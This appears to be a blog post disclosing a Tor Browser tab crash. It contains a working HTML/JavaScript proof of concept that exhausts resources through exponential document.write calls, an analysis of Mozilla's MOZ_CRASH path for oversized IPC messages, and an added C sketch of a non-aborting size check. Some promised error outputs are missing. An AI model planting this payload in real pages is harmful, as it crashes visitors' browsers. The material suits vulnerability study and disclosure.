Hi Internet,
IPC (inter-process communication) is the mechanism; IPDL is the Mozilla-specific language used to define the messages passed between processes and threads in a secure way.
Note: most IPC-based crashes in the browser are not eligible for the BBB // not sure
Code snippet:
<!DOCTYPE html>
<html>
<head>
<script>
// Proof of concept from the post: the string doubles on every iteration and
// each iteration writes it into the document, so the payload grows exponentially.
function tor()
{
    var uristring = unescape("%u4141%u4141");
    for (var i = 0; i <= 50; ++i)
    {
        uristring += uristring;
        document.write(uristring);
    }
    document.write(uristring);
}
</script>
</head>
<body onload="tor()">
</body>
</html>
Running the above code in Tor Browser crashes the tab: 'Gah! This tab has crashed.'
Running Tor Browser in debug mode generated the error below:
So, this seems to be a kind of resource exhaustion attack that leads to a crash in Tor Browser. For instance, if you try it in vanilla Firefox it freezes your page, and if one disables multiprocess mode one can witness the same behavior in Tor Browser as well.
Running the snippet in an ASan build gets:
Looking at the particular code you'll see:
#ifdef MOZ_CRASHREPORTER
CrashReporter::AnnotateCrashReport(NS_LITERAL_CSTRING("IPCMessageName"), nsDependentCString(msg->name()));
CrashReporter::AnnotateCrashReport(NS_LITERAL_CSTRING("IPCMessageSize"), nsPrintfCString("%d", msg->size()));
#endif
MOZ_CRASH("IPC message size is too large");
So, what seems to be happening here is that without --disable-crashreporter (vanilla Firefox builds are built without it) the tab loading your code is stuck in the #ifdef MOZ_CRASHREPORTER block, while Tor Browser (which is built with --disable-crashreporter) hits the MOZ_CRASH() call directly. This crashes at MOZ_CRASH() because the IPC message is too large. This issue was marked as informative by Tor via H1.
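As an added illustration (not code from this post or from Mozilla), here is the same size check in C with a non-aborting return value instead of MOZ_CRASH(), plus a model of the doubling loop above that reports the iteration at which a write would first cross the limit. The 256 MiB cap and the message name are assumptions made for the example.

```c
#include <stdint.h>
#include <stdio.h>

/* Assumed cap for illustration; Firefox's real limit is a constant in its IPC glue. */
#define MAX_IPC_MESSAGE_SIZE ((size_t)256 * 1024 * 1024)   /* 256 MiB */

typedef struct {
    const char *name;  /* message name, as annotated in the snippet above */
    size_t size;       /* serialized size in bytes, as msg->size() above */
} ipc_message;

typedef enum { SEND_OK = 0, SEND_TOO_LARGE = 1 } send_result;

/* Graceful counterpart of the MOZ_CRASH() path: same size check, but the
 * caller gets an error code and a log line instead of the process aborting. */
send_result send_checked(const ipc_message *msg, size_t limit, char *why, size_t why_len)
{
    if (msg->size >= limit) {
        snprintf(why, why_len, "IPC message %s rejected: %zu bytes >= limit %zu",
                 msg->name, msg->size, limit);
        return SEND_TOO_LARGE;
    }
    why[0] = '\0';
    return SEND_OK;
}

/* Models the page's loop: each iteration doubles the payload and then sends it.
 * Returns the iteration at which the first send is rejected, or -1 if every
 * send up to `iterations` fits under `limit`. */
int first_rejected_iteration(size_t initial_bytes, size_t limit, int iterations)
{
    char why[160];
    ipc_message msg = { "PoC::Msg_DocumentWrite", initial_bytes }; /* constructed name */
    for (int i = 0; i <= iterations; ++i) {
        if (msg.size > SIZE_MAX / 2)   /* next doubling would overflow size_t */
            return i;                   /* it cannot fit under any limit either */
        msg.size *= 2;                  /* uristring += uristring */
        if (send_checked(&msg, limit, why, sizeof why) != SEND_OK) {  /* document.write */
            fprintf(stderr, "iteration %d: %s\n", i, why);
            return i;
        }
    }
    return -1;
}

int main(void)
{
    /* unescape("%u4141%u4141") yields two UTF-16 code units, i.e. 4 bytes. */
    printf("first rejected iteration: %d\n",
           first_rejected_iteration(4, MAX_IPC_MESSAGE_SIZE, 50));
    return 0;
}
```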